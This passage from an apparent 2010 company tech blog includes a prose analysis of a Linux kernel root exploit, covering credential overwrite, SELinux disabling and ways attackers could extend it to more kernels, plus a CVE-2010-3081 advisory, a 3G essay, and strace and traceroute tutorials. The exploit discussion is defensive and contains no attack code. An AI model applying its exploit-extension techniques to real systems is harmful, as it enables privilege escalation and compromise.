This means setting the process's user ID to 0, root, so that everything else it does is with root privileges. A process's user ID is stored in different places in different kernel versions -- the system became more complicated in 2.6.29, and again in 2.6.30 -- so the exploit needs to have flexibility again. This one checks the version with uname and assembles the payload accordingly.
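
The version check itself is nothing exotic -- it's the same information any userspace program can ask for. A trivial illustration (my example, not the exploit's code):

#!/usr/bin/python
# The uname(2) syscall reports the kernel release string the exploit keys off of.
import os
print os.uname()[2]   # e.g. '2.6.32-24-generic'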

This exploit can also clear a couple of flags to turn off SELinux, with code it optionally includes in the payload -- more flexibility. Then it lets the kernel return to userspace, and starts a root shell.

In a real attack, that root shell might be used to replace key system binaries, steal data, start a botnet daemon, or install backdoors on disk to cement the attacker's control and hide their presence.

Flexibility, or, You Can't Trust a Failing Exploit

All the points of flexibility in this exploit illustrate a key lesson: you can't determine you're vulnerable just because an exploit fails. For example, on a Fedora 13 system, this exploit errors out with a message like this:
  $ ./ABftw
  Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
  $$$ Kallsyms +r
  $$$ K3rn3l r3l3as3: 2.6.34.6-54.fc13.i686
  [...]
  !!! Err0r 1n s3tt1ng cr3d sh3llc0d3z 
Sometimes a system administrator sees an exploit fail like that and concludes they're safe. "Oh, Red Hat / Debian / my vendor says I'm vulnerable", they may say. "But the exploit doesn't work, so they're just making stuff up, right?"

Unfortunately, this can be a fatal mistake. In fact, the machine above is vulnerable. The error message only comes about because the exploit can't find the symbol per_cpu__current_task, whose value it needs in the payload; it's the address at which to find the kernel's main per-process data structure, the task_struct. But a skilled attacker can find the task_struct without that symbol, by following pointers from other known data structures in the kernel.

In general, there is an almost unlimited amount of work an exploit writer could put in to make the exploit function on more and more kernels. Use a wider repertoire of targets; find missing symbols by following pointers or by pattern-matching in the kernel; find missing symbols by brute force, with a table prepared in advance; disable SELinux, as this exploit does, or grsecurity; or add special code to navigate the data structures of unusual kernels like OpenVZ. If the bug is there in a kernel but the exploit breaks, it's only a matter of work or more work to extend the exploit to function there too.

That's why the only way to know that a given kernel is not affected by a vulnerability is a careful examination of the bug against the kernel's source code and configuration, and never to rely on a failing exploit -- and even that examination can sometimes be mistakenly optimistic. In practice, for a busy system administrator this means that when the vendor recommends you update, the only safe choice is to update.

~price

Friday Sep 17, 2010

CVE-2010-3081

Hi. I'm the original developer of Ksplice and the CEO of the company. Today is one of those days that reminds me why I created Ksplice.

I'm writing this blog post to provide some information and assistance to anyone affected by the recent Linux kernel vulnerability CVE-2010-3081, which unfortunately is just about everyone running 64-bit Linux. To make matters worse, in the last day we've received many reports of people attacking production systems using an exploit for this vulnerability, so if you run Linux systems, we recommend that you strongly consider patching this vulnerability. (Linux vendors release important security updates every month, but this vulnerability is particularly high profile and people are using it aggressively to exploit systems).

This vulnerability was introduced into the Linux kernel in April 2008, and so essentially every distribution is affected, including RHEL, CentOS, Debian, Ubuntu, Parallels Virtuozzo Containers, OpenVZ, CloudLinux, and SuSE, among others. A few vendors have released kernels that fix the vulnerability if you reboot, but other vendors, including Red Hat, are still working on releasing an updated kernel.

The published workarounds that we've seen, including the workaround recommended by Red Hat, can themselves be worked around by an attacker to still exploit the system. For now, to be responsible and avoid helping attackers, we don't want to provide those technical details publicly; we've contacted Red Hat and other vendors with the details and we'll cover them in a future blog post, in a few weeks.

Although it might seem self-serving, I do know of one sure way to fix this vulnerability right away on running production systems, and it doesn't even require you to reboot: you can (for free) download Ksplice Uptrack and fully update any of the distributions that we support: RHEL, CentOS, Debian, Ubuntu, Parallels Virtuozzo Containers, OpenVZ, and CloudLinux. (For high profile updates like this one, Ksplice optionally makes an update available for your distribution before your distribution officially releases a new kernel.) We provide a free 30-day trial of Ksplice Uptrack on our website, and you can use this free trial to protect your systems, even if you cannot arrange to reboot anytime soon. It's the best that we can do to help in this situation, and I hope that it's useful to you.

Note: If an attacker has already compromised one of your machines using an exploit for CVE-2010-3081, simply updating the system will not eliminate the presence of an attacker. Similarly, if a machine has already been exploited, then the exploit may continue working on that system even after it has been updated, because of a backdoor that the exploit installs. We've published a test tool to check whether your system has already been compromised by the public CVE-2010-3081 exploit code that we've seen. If one or more of your machines has already been compromised by an attacker, we recommend that you use your normal procedure for dealing with that situation.

~jbarnold

Monday Aug 30, 2010

Ksplice for Fedora!

In response to many requests, Ksplice is proud to announce we're now providing Uptrack free of charge for Fedora!

Fedora will join Ubuntu Desktop among our free platforms, and will give Fedora users rebootless updates as long as Fedora maintains each major kernel release.

One caveat: Fedora is the only Linux distribution that migrates to a new Linux kernel version family (e.g. 2.6.33 to 2.6.34) during the lifetime of the product. That migration is a major enough version change that Ksplice recommends a reboot for it. These migrations occur roughly twice per year and only in Fedora; all of the other important Fedora kernel updates can be applied rebootlessly, as can the kernel updates for the rest of our supported Linux distributions.

We've also submitted the Uptrack client for integration into a later version of Fedora and are working with the Fedora folks to help make rebootless updates part of the distribution itself. Thanks for all your feedback about Uptrack and keep it coming! 

Best, 
the Ksplice Team

Thursday Aug 19, 2010

Essay: 3G and me

In 2002, I got my first cell phone.

June was stuffy in Manhattan, and my summer internship copy-editing the New York Sun, the now-defunct right-wing newspaper, was just about to start. I swam through the humid air past Madison Square Park to get to the store before closing.

"You want this one," said the salesman at the RadioShack, pointing to a sleek model then on sale. "It's a 3G phone. It'll work with Sprint's new 3G network they're rolling out later this summer."

"Ok," I said. Sure enough, it had 3G:

Sanyo SCP-6200. QUALCOMM 3G CDMA
Fig. 1: Sprint's Sanyo 3G phone, circa mid-2002. An orange of more recent vintage looks on.

A few months later -- after all the Sun's editorials casting doubt on whether lead paint can really poison you had been edited and sent off to our eight readers, and I was back at school -- Sprint did roll out their 3G network:

Sprint launched nationwide 3G service in the 2002 third quarter. The service, marketed as "PCS Vision", allows consumer and business customers to use their Vision-enabled PCS devices to take and receive pictures, check personal and corporate e-mail, play games with full-color graphics and polyphonic sounds and browse the Internet wirelessly with speeds up to 144 kbps (with average speeds of 50 to 70 kbps).

I called Sprint and tried to subscribe. "Sir, you need a 3G phone to sign up," they told me.

"I have one!" I said proudly. "It says 3G CDMA right on the back!"

"Oh, I'm sorry sir. We've changed the labeling of that model. That phone doesn't have true 3G. It doesn't say that on the back any more. If you like I would be happy to sell you the next model, the SCP-6400, which has true 3G."

"No, thanks," I said, thinking that 3G was pretty much a crock, while wryly appreciating RadioShack's ability to make you feel cheated even on a $30 cellphone.

Sure enough, when my phone died and had to be replaced, I saw the new one only said "QUALCOMM CDMA" -- no more "3G". It had been revised downward.

Meanwhile, Sprint's competitors were busy deploying their own nationwide 3G networks. Cingular, then a joint venture of SBC and BellSouth, trumpeted each step in the process:

June 2003:

ATLANTA, June 30 -- Cingular Wireless today announced the world's first commercial deployment of wireless services using Enhanced Datarate for Global Evolution (EDGE) technology. Cingular's initial EDGE service offering is in its Indianapolis market, with subsequent deployments expected later in the year.

Building on more than a decade of wireless data experience, Cingular's EDGE technology enables true "third generation" (3G) wireless data services with data speeds typically three times faster than those available on GSM/GPRS networks.


Or October 2003:
Cingular began offering its 3G service EDGE (Enhanced Datarate for Global Evolution) in Indianapolis in July, becoming the first commercial wireless company in the world to offer the service.

Or June 2004:
This year, further enhancements have been made to the network with the launch of EDGE in Connecticut, a high-speed wireless data service which gives customers true "third generation" (3G) wireless data services with data speeds typically three times faster than what was available on GPRS.

Those of you who care about these things will probably be jumping up and down right now, and/or closing the browser window. "EDGE isn't 3G!" you are saying. "It's 2.9G at best! And neither is 1xRTT, which is all the Sanyo SCP-6200 had. That's barely 2.5G! Maybe 2.75G on a clear day."

These people, who while enthusiastic sometimes seem to have been born yesterday, would point to the kerfuffle when Apple released the original iPhone in 2007 for Cingular and only supported EDGE. As the Wall Street Journal wrote:

Detractors and fans are going toe to toe on online forums. Much of the latest criticism is zooming in on Apple's choice of technologies to use with the new phone and its decision to partner exclusively with AT&T Inc.'s Cingular Wireless, which is being rebranded as AT&T.

For example, the iPhone won't use the fastest wireless Internet connection available, relying on so-called second-generation, or 2G, rather than faster 3G networks now being rolled out by major wireless carriers. Because of this, industry experts expect features of the iPhone such as Web browsing and downloading not to be very fast.

Tim Cook, Apple's chief operating officer, said during a conference call with analysts yesterday the company is sold on Cingular's 2G EDGE network because "it's much more widespread and widely deployed in the U.S." Mr. Cook didn't comment on whether Apple will eventually support 3G but said, "Obviously we would be where the technology is over time." Some people refer to EDGE as 2.5G.

By 2007, Cingular/AT&T was happy to downgrade its EDGE offerings in favor of a newer kind of 3G (known as W-CDMA or UMTS). From an interview with AT&T's chief, Randall Stephenson, in the New York Times in June 2007:
"I got to tell you, carrying this thing around and experiencing those kinds of speeds on a wireless handset, your imagination begins to run in terms of what's possible," he said, "and by the way, there's not a 3G network available in Ottumwa, Iowa," referring to the so-called third generation of Web-enabled cellphones that require faster networks. "If you want to sell these devices in a variety of places, Edge is the only opportunity you have."

AT&T has invested $16 billion in its network over the last two years, and the network is now designed to handle the expected increase in wireless data users, he said, adding: "Capacity won't be an issue. The network is ready."

Ok, what are some quick takeaways here?
  • What Sprint sold as "3G" in 2002 (1xRTT voice), it rescinded later that year and relabeled the phones.
  • What counted as "3G" for Sprint in 2003 (1xRTT data), isn't any more either.
  • What in 2004 constituted "true 'third generation' (3G)" to Cingular/AT&T, the company had retroactively downgraded to 2G or 2.5G or 2.9G by 2007.
  • From an engineer's perspective, the 3G interfaces, if you read a book on telecom engineering, are CDMA2000 (including 1xRTT and EV-DO), EDGE, and W-CDMA (including UMTS, with or without HSUPA and HSDPA). The International Telecommunications Union has published a standard for third-generation wireless communications, known as IMT-2000, that includes those three and a few others.
  • To a first approximation, the first launch of "3G" in the United States, around 2002 and 2003, was a dud. The carriers responded by dusting themselves off, redoubling their efforts, deploying a new thing and retroactively downgrading their old "3G" product to be... some smaller number of G's. "3G" itself is not a technical term with a whole lot of meaning, especially as it lumps together so many incompatible, competing air interface protocols. The situation for consumers was less confused in Europe, where GSM and W-CDMA are dominant, governments auctioned new frequencies set aside for "3G," and the carrier offerings were more distinct.
  • The same song-and-dance is likely to play out over "4G" -- a term that engineers tentatively apply to a forthcoming ITU standard called IMT-Advanced, and carriers apply to whatever they want you to buy now. You might notice that Sprint is currently selling Mobile WiMAX as "4G." Mobile WiMAX is part of IMT-2000 -- the 3G standard. Verizon Wireless is selling something called "LTE" as "4G" -- it ain't in IMT-Advanced either. Today's "4G" products are like the "3G" of 2002 and 2003 -- they will become "3.75G" as soon as the next hot thing comes out.

But the point I really want to make is: this is all a red herring. Focusing on the protocol between your cell phone and the tower -- or worse, spending money on that basis -- is letting yourself be distracted. It's like the secret pick-me-up in Geritol, concocted by Madison Avenue instead of a chemist.

A cell phone is essentially sharing a swath of radio spectrum with a bunch of other people within a cell. Think of it like a cable modem or any other ISP. You can have the world's most sophisticated modem, but if it's trying to talk in a tiny slice of spectrum shared with everybody else within miles around (because there aren't enough towers to divide you up into cells), it'll still be awful.

Consider, for example, the performance I get from a Verizon "3G" USB modem:

    3060 packets transmitted, 3007 received, 1% packet loss, time 3061925ms
    rtt min/avg/max/mdev = 121.554/404.199/22307.520/1213.055 ms, pipe 23

Pretty sad! But hey, it's 3G. In truth, a lot of boring factors control the performance of your cell phone data transmissions, principally:

  1. How much spectrum has the carrier licensed in my city, and how much is allocated to this kind of modulation?
  2. How many other people am I sharing the local tower with? In other words, how big is my cell, and how many towers has the carrier built or contracted with?
  3. How much throughput are my cellmates trying to consume?
  4. How much throughput has the carrier built in its back-end network connecting to the tower?

You might notice that all of these meat-and-potatoes factors involve the carrier spending money, and they all involve gradual improvement in behind-the-scenes infrastructure that's hard to get customers excited about. Persuading you to buy a new cell phone with a sophisticated modem and sign up for a two-year contract is a different story. So they don't sell you something measurable where they could be held accountable; they sell how sweet it feels to be using a sophisticated radio modem protocol to talk to them.

Don't get me wrong -- UMTS and EV-DO are sophisticated protocols, and a lot of smart people and clever techniques made them legitimate engineering accomplishments. But the boring factors -- the raw resources being shared among the nearby customers -- dictate your performance just as much as incremental improvements in the air interface. What we really ought to care about is the same as with any Internet service provider -- the throughput and latency and reliability you get to the endpoints you want to reach. That's what matters, not the sophistication of one piece of the puzzle.

If the carrier sold you "384 kbps Internet access anywhere in the coverage area, outdoors," that would be something you could hold them accountable for. The carrier might even have to put a brake on signing up new customers until it could build new towers or license more spectrum for everybody to share, if it made that guarantee.

Some have proposed even more freely enterprising business models -- like having your phone get minute-to-minute bids from the local towers on who will carry your traffic for what price, and accept the lowest bidder who offers acceptable performance.

Selling you "3G" -- well, that's a lot easier to live up to. And it changes every year. So don't tell me how many G's your new phone has. We've loved and lost so many G's at this point. Tell me you got a new phone where you pay to get 1 Mbps and 100 ms rtt to major exchange points. When the market moves forward enough to make that a reality, that'll be a generation worth celebrating.

~keithw

Thursday Aug 05, 2010

Strace -- The Sysadmin's Microscope

Sometimes as a sysadmin the logfiles just don't cut it, and to solve a problem you need to know what's really going on. That's when I turn to strace -- the system-call tracer.

A system call, or syscall, is where a program crosses the boundary between user code and the kernel. Fortunately for us using strace, that boundary is where almost everything interesting happens in a typical program.

The two basic jobs of a modern operating system are abstraction and multiplexing. Abstraction means, for example, that when your program wants to read and write to disk it doesn't need to speak the SATA protocol, or SCSI, or IDE, or USB Mass Storage, or NFS. It speaks in a single, common vocabulary of directories and files, and the operating system translates that abstract vocabulary into whatever has to be done with the actual underlying hardware you have. Multiplexing means that your programs and mine each get fair access to the hardware, and don't have the ability to step on each other -- which means your program can't be permitted to skip the kernel, and speak raw SATA or SCSI to the actual hardware, even if it wanted to.

So for almost everything a program wants to do, it needs to talk to the kernel. Want to read or write a file? Make the open() syscall, and then the syscalls read() or write(). Talk on the network? You need the syscalls socket(), connect(), and again read() and write(). Make more processes? First clone() (inside the standard C library function fork()), then you probably want execve() so the new process runs its own program, and you probably want to interact with that process somehow, with one of wait4(), kill(), pipe(), and a host of others. Even looking at the clock requires a system call, clock_gettime(). Every one of those system calls will show up when we apply strace to the program.
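
To make that concrete, here's a two-line script (my own toy example) and how to watch it under strace; buried in the interpreter's startup noise you should spot an open() on /etc/hostname, a read() of its contents, and a write() to stdout.

# tiny.py -- run it as: strace -e trace=open,read,write python tiny.py
with open("/etc/hostname") as f:
    print f.read()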

In fact, just about the only thing a process can do without making a telltale system call is pure computation -- using the CPU and RAM and nothing else. As a former algorithms person, that's what I used to think was the fun part. Fortunately for us as sysadmins, very few real-life programs spend very long in that pure realm before they have to deal with a file or the network or some other part of the system -- and then strace picks them up again.

Let's look at a quick example of how strace solves problems.

Use #1: Understand A Complex Program's Actual Behavior
One day, I wanted to know which Git commands take out a certain lock -- I had a script running a series of different Git commands, and it was failing sometimes when run concurrently because two commands tried to hold the lock at the same time.

Now, I love sourcediving, and I've done some Git hacking, so I spent some time with the source tree investigating this question. But this code is complex enough that I was still left with some uncertainty. So I decided to get a plain, ground-truth answer to the question: if I run "git diff", will it grab this lock?

Strace to the rescue. The lock is on a file called index.lock. Anything trying to touch the file will show up in strace. So we can just trace a command the whole way through and use grep to see if index.lock is mentioned:

$ strace git status 2>&1 >/dev/null | grep index.lock
open(".git/index.lock", O_RDWR|O_CREAT|O_EXCL, 0666) = 3
rename(".git/index.lock", ".git/index") = 0

$ strace git diff 2>&1 >/dev/null | grep index.lock
$

So git status takes the lock, and git diff doesn't.

Interlude: The Toolbox
To help make it useful for so many purposes, strace takes a variety of options to add or cut out different kinds of detail and help you see exactly what's going on.

In Medias Res, If You Want
Sometimes we don't have the luxury of starting a program over to run it under strace -- it's running, it's misbehaving, and we need to find out what's going on. Fortunately strace handles this case with ease. Instead of specifying a command line for strace to execute and trace, just pass -p PID where PID is the process ID of the process in question -- I find pstree -p invaluable for identifying this -- and strace will attach to that program, while it's running, and start telling you all about it.

Times
When I use strace, I almost always pass the -tt option. This tells me when each syscall happened -- -t prints it to the second, -tt to the microsecond. For system administration problems, this often helps a lot in correlating the trace with other logs, or in seeing where a program is spending too much time.

For performance issues, the -T option comes in handy too -- it tells me how long each individual syscall took from start to finish.

Data
By default strace already prints the strings that the program passes to and from the system -- filenames, data read and written, and so on. To keep the output readable, it cuts off the strings at 32 characters. You can see more with the -s option -- -s 1024 makes strace print up to 1024 characters for each string -- or cut out the strings entirely with -s 0.

Sometimes you want to see the full data flowing in just a few directions, without cluttering your trace with other flows of data. Here the options -e read= and -e write= come in handy.

For example, say you have a program talking to a database server, and you want to see the SQL queries, but not the voluminous data that comes back. The queries and responses go via write() and read() syscalls on a network socket to the database. First, take a preliminary look at the trace to see those syscalls in action:

$ strace -p 9026
Process 9026 attached - interrupt to quit
read(3, "\1\0\0\1\1A\0\0\2\3def\7youtomb\tartifacts\ta"..., 16384) = 116
poll([{fd=3, events=POLLIN|POLLPRI}], 1, 0) = 0 (Timeout)
write(3, "0\0\0\0\3SELECT timestamp FROM artifa"..., 52) = 52
read(3, "\1\0\0\1\1A\0\0\2\3def\7youtomb\tartifacts\ta"..., 16384) = 116
poll([{fd=3, events=POLLIN|POLLPRI}], 1, 0) = 0 (Timeout)
write(3, "0\0\0\0\3SELECT timestamp FROM artifa"..., 52) = 52
[...]

Those write() syscalls are the SQL queries -- we can make out the SELECT foo FROM bar, and then it trails off. To see the rest, note the file descriptor the syscalls are happening on -- the first argument of read() or write(), which is 3 here. Pass that file descriptor to -e write=:

$ strace -p 9026 -e write=3
Process 9026 attached - interrupt to quit
read(3, "\1\0\0\1\1A\0\0\2\3def\7youtomb\tartifacts\ta"..., 16384) = 116
poll([{fd=3, events=POLLIN|POLLPRI}], 1, 0) = 0 (Timeout)
write(3, "0\0\0\0\3SELECT timestamp FROM artifa"..., 52) = 52
 | 00000  30 00 00 00 03 53 45 4c  45 43 54 20 74 69 6d 65  0....SEL ECT time |
 | 00010  73 74 61 6d 70 20 46 52  4f 4d 20 61 72 74 69 66  stamp FR OM artif |
 | 00020  61 63 74 73 20 57 48 45  52 45 20 69 64 20 3d 20  acts WHE RE id =  |
 | 00030  31 34 35 34                                       1454              |

and we see the whole query. It's both printed and in hex, in case it's binary. We could also get the whole thing with an option like -s 1024, but then we'd see all the data coming back via read() -- the use of -e write= lets us pick and choose.

Filtering the Output
Sometimes the full syscall trace is too much -- you just want to see what files the program touches, or when it reads and writes data, or some other subset. For this the -e trace= option was made. You can select a named suite of system calls like -e trace=file (for syscalls that mention filenames) or -e trace=desc (for read() and write() and friends, which mention file descriptors), or name individual system calls by hand. We'll use this option in the next example.

Child Processes
Sometimes the process you trace doesn't do the real work itself, but delegates it to child processes that it creates. Shell scripts and Make runs are notorious for taking this behavior to the extreme. If that's the case, you may want to pass -f to make strace "follow forks" and trace child processes, too, as soon as they're made.

For example, here's a trace of a simple shell script, without -f:

$ strace -e trace=process,file,desc sh -c \
   'for d in .git/objects/*; do ls $d >/dev/null; done'
[...]
stat("/bin/ls", {st_mode=S_IFREG|0755, st_size=101992, ...}) = 0
clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f4b68af5770) = 11948
wait4(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 11948
--- SIGCHLD (Child exited) @ 0 (0) ---
wait4(-1, 0x7fffc3473604, WNOHANG, NULL) = -1 ECHILD (No child processes)

Not much to see here -- all the real work was done inside process 11948, the one created by that clone() syscall.

Here's the same script traced with -f (and the trace edited for brevity):

$ strace -f -e trace=process,file,desc sh -c \
   'for d in .git/objects/*; do ls $d >/dev/null; done'
[...]
stat("/bin/ls", {st_mode=S_IFREG|0755, st_size=101992, ...}) = 0
clone(Process 10738 attached
child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f5a93f99770) = 10738
[pid 10682] wait4(-1, Process 10682 suspended

[pid 10738] open("/dev/null", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 3
[pid 10738] dup2(3, 1)                  = 1
[pid 10738] close(3)                    = 0
[pid 10738] execve("/bin/ls", ["ls", ".git/objects/28"], [/* 25 vars */]) = 0
[... setup of C standard library omitted ...]
[pid 10738] stat(".git/objects/28", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
[pid 10738] open(".git/objects/28", O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC) = 3
[pid 10738] getdents(3, /* 40 entries */, 4096) = 2480
[pid 10738] getdents(3, /* 0 entries */, 4096) = 0
[pid 10738] close(3)                    = 0
[pid 10738] write(1, "04102fadac20da3550d381f444ccb5676"..., 1482) = 1482
[pid 10738] close(1)                    = 0
[pid 10738] close(2)                    = 0
[pid 10738] exit_group(0)               = ?
Process 10682 resumed
Process 10738 detached
<... wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 10738
--- SIGCHLD (Child exited) @ 0 (0) ---

Now this trace could be a miniature education in Unix in itself -- future blog post? The key thing is that you can see ls do its work, with that open() call followed by getdents().

The output gets cluttered quickly when multiple processes are traced at once, so sometimes you want -ff, which makes strace write each process's trace into a separate file.

Use #2: Why/Where Is A Program Stuck?
Sometimes a program doesn't seem to be doing anything. Most often, that means it's blocked in some system call. Strace to the rescue.

$ strace -p 22067
Process 22067 attached - interrupt to quit
flock(3, LOCK_EX

Here it's blocked trying to take out a lock, an exclusive lock (LOCK_EX) on the file it's opened as file descriptor 3. What file is that?

$ readlink /proc/22067/fd/3
/tmp/foobar.lock

Aha, it's the file /tmp/foobar.lock. And what process is holding that lock?

$ lsof | grep /tmp/foobar.lock
 command   21856       price    3uW     REG 253,88       0 34443743 /tmp/foobar.lock
 command   22067       price    3u      REG 253,88       0 34443743 /tmp/foobar.lock

Process 21856 is holding the lock. Now we can go figure out why 21856 has been holding the lock for so long, whether 21856 and 22067 really need to grab the same lock, etc.

Other common ways the program might be stuck, and how you can learn more after discovering them with strace:

  • Waiting on the network. Use lsof again to see the remote hostname and port.
  • Trying to read a directory. Don't laugh -- this can actually happen when you have a giant directory with many thousands of entries. And if the directory used to be giant and is now small again, on a traditional filesystem like ext3 it becomes a long list of "nothing to see here" entries, so a single syscall may spend minutes scanning the deleted entries before returning the list of survivors.
  • Not making syscalls at all. This means it's doing some pure computation, perhaps a bunch of math. You're outside of strace's domain; good luck.

Uses #3, #4, ...
A post of this length can only scratch the surface of what strace can do in a sysadmin's toolbox. Some of my other favorites include

  • As a progress bar. When a program's in the middle of a long task and you want to estimate if it'll be another three hours or three days, strace can tell you what it's doing right now -- and a little cleverness can often tell you how far that places it in the overall task.
  • Measuring latency. There's no better way to tell how long your application takes to talk to that remote server than watching it actually read() from the server, with strace -T as your stopwatch.
  • Identifying hot spots. Profilers are great, but they don't always reflect the structure of your program. And have you ever tried to profile a shell script? Sometimes the best data comes from sending a strace -tt run to a file, and picking through to see when each phase of your program started and finished.
  • As a teaching and learning tool. The user/kernel boundary is where almost everything interesting happens in your system. So if you want to know more about how your system really works -- how about curling up with a set of man pages and some output from strace?

~price

Thursday Jul 29, 2010

Choose Your Own Sysadmin Adventure

Today is System Administrator Appreciation Day, and being system administrators ourselves,  we here at Ksplice decided to have a little fun with this holiday.

We've taken a break, drank way too much coffee, and created a very special Choose Your Own Adventure for all the system administrators out there.

Click here to begin the adventure.

Feedback and comments welcome. Above all: Happy System Administrator Appreciation Day. Share the love with your friends, colleagues, and especially any sysadmins you might know.

~ternus

Wednesday Jul 28, 2010

Learning by doing: Writing your own traceroute in 8 easy steps

Anyone who administers even a moderately sized network knows that when problems arise, diagnosing and fixing them can be extremely difficult. They're usually non-deterministic and difficult to reproduce, and very similar symptoms (e.g. a slow or unreliable connection) can be caused by any number of problems — congestion, a broken router, a bad physical link, etc.

One very useful weapon in a system administrator's arsenal for dealing with network issues is traceroute (or tracert, if you use Windows). This is a neat little program that will print out the path that packets take to get from the local machine to a destination — that is, the sequence of routers that the packets go through.

Using traceroute is pretty straightforward. On a UNIX-like system, you can do something like the following:

    $ traceroute google.com
    traceroute to google.com (173.194.33.104), 30 hops max, 60 byte packets
     1  router.lan (192.168.1.1)  0.595 ms  1.276 ms  1.519 ms
     2  70.162.48.1 (70.162.48.1)  13.669 ms  17.583 ms  18.242 ms
     3  ge-2-20-ur01.cambridge.ma.boston.comcast.net (68.87.36.225)  18.710 ms  19.192 ms  19.640 ms
     4  be-51-ar01.needham.ma.boston.comcast.net (68.85.162.157)  20.642 ms  21.160 ms  21.571 ms
     5  pos-2-4-0-0-cr01.newyork.ny.ibone.comcast.net (68.86.90.61)  28.870 ms  29.788 ms  30.437 ms
     6  pos-0-3-0-0-pe01.111eighthave.ny.ibone.comcast.net (68.86.86.190)  30.911 ms  17.377 ms  15.442 ms
     7  as15169-3.111eighthave.ny.ibone.comcast.net (75.149.230.194)  40.081 ms  41.018 ms  39.229 ms
     8  72.14.238.232 (72.14.238.232)  20.139 ms  21.629 ms  20.965 ms
     9  216.239.48.24 (216.239.48.24)  25.771 ms  26.196 ms  26.633 ms
    10 173.194.33.104 (173.194.33.104)  23.856 ms  24.820 ms  27.722 ms

Pretty nifty. But how does it work? After all, when a packet leaves your network, you can't monitor it anymore. So when it hits all those routers, the only way you can know about that is if one of them tells you about it.

The secret behind traceroute is a field called "Time To Live" (TTL) that is contained in the headers of the packets sent via the Internet Protocol. When a host receives a packet, it checks if the packet's TTL is greater than 1 before sending it on down the chain. If it is, it decrements the field. Otherwise, it drops the packet and sends an ICMP TIME_EXCEEDED packet to the sender. This packet, like all IP packets, contains the address of its sender, i.e. the intermediate host.

traceroute works by sending consecutive requests to the same destination with increasing TTL fields. Most of these attempts result in messages from intermediate hosts saying that the packet was dropped. The IP addresses of these intermediate hosts are then printed on the screen (generally with an attempt made at determining the hostname) as they arrive, terminating when the maximum number of hosts have been hit (on my machine's traceroute the default maximum is 30, but this is configurable), or when the intended destination has been reached.

The rest of this post will walk through implementing a very primitive version of traceroute in Python. The real traceroute is of course more complicated than what we will create, with many configurable features and modes. Still, our version will implement the basic functionality, and at the end, we'll have a really nice and short Python script that will do just fine for performing a simple traceroute.

So let's begin. Our algorithm, at a high level, is an infinite loop whose body creates a connection, prints out information about it, and then breaks out of the loop if a certain condition has been reached. So we can start with the following skeletal code:

    def main(dest):
        while True:
            # ... open connections ...
            # ... print data ...
            # ... break if useful ...
            pass

    if __name__ == "__main__":
        main('google.com')

Step 1: Turn a hostname into an IP address.

The socket module provides a gethostbyname() method that attempts to resolve a domain name into an IP address:

    #!/usr/bin/python

    import socket

    def main(dest_name):
        dest_addr = socket.gethostbyname(dest_name)
        while True:
            # ... open connections ...
            # ... print data ...
            # ... break if useful ...
            pass

    if __name__ == "__main__":
        main('google.com')
Step 2: Create sockets for the connections.

We'll need two sockets for our connections — one for receiving data and one for sending. We have a lot of choices for what kind of probes to send; let's use UDP probes, which require a datagram socket (SOCK_DGRAM). The routers along our traceroute path are going to send back ICMP packets, so for those we need a raw socket (SOCK_RAW).

    #!/usr/bin/python

    import socket

    def main(dest_name):
        dest_addr = socket.gethostbyname(dest_name)
        icmp = socket.getprotobyname('icmp')
        udp = socket.getprotobyname('udp')
        while True:
            recv_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)
            send_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, udp)
            # ... print data ...
            # ... break if useful ...

    if __name__ == "__main__":
        main('google.com')

Step 3: Set the TTL field on the packets.

We'll simply use a counter which begins at 1 and which we increment with each iteration of the loop. We set the TTL using the setsockopt() method of the socket object:

    #!/usr/bin/python

    import socket

    def main(dest_name):
        dest_addr = socket.gethostbyname(dest_name)
        icmp = socket.getprotobyname('icmp')
        udp = socket.getprotobyname('udp')
        ttl = 1
        while True:
            recv_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)
            send_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, udp)
            send_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)

            ttl += 1
            # ... print data ...
            # ... break if useful ...

    if __name__ == "__main__":
        main('google.com')

Step 4: Bind the sockets and send some packets.

Now that our sockets are all set up, we can put them to work! We first tell the receiving socket to listen for packets from all hosts on a specific port (most implementations of traceroute use ports from 33434 to 33534, so we will use 33434 as a default). We do this using the bind() method of the receiving socket object, by specifying the port and an empty string for the hostname. We can then use the sendto() method of the sending socket object to send to the destination host (on the same port). The first argument of the sendto() method is the data to send; in our case, we don't actually have anything specific we want to send, so we can just give the empty string:

    #!/usr/bin/python

    import socket

    def main(dest_name):
        dest_addr = socket.gethostbyname(dest_name)
        port = 33434
        icmp = socket.getprotobyname('icmp')
        udp = socket.getprotobyname('udp')
        ttl = 1
        while True:
            recv_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)
            send_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, udp)
            send_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
            recv_socket.bind(("", port))
            send_socket.sendto("", (dest_name, port))

            ttl += 1
            # ... print data ...
            # ... break if useful ...

    if __name__ == "__main__":
        main('google.com')
Step 5: Get the intermediate hosts' IP addresses.

Next, we need to actually get our data from the receiving socket. For this, we can use the recvfrom() method of the object, whose return value is a tuple containing the packet data and the sender's address. In our case, we only care about the latter. Note that the address is itself actually a tuple containing both the IP address and the port, but we only care about the former. recvfrom() takes a single argument, the blocksize to read — let's go with 512.

It's worth noting that some administrators block or rate-limit ICMP traffic, pretty much specifically to prevent the use of utilities like traceroute, since the detailed layout of a network can be sensitive information (another common reason to restrict ICMP is the ping utility, which can be used for denial-of-service attacks). It is therefore completely possible that the receive will fail with an error, which will result in an exception. Thus, we'll wrap this call in a try/except block. Traditionally, traceroute prints asterisks when it can't get the address of a host. We'll do the same once we print out results.

    #!/usr/bin/python

    import socket

    def main(dest_name):
        dest_addr = socket.gethostbyname(dest_name)
        port = 33434
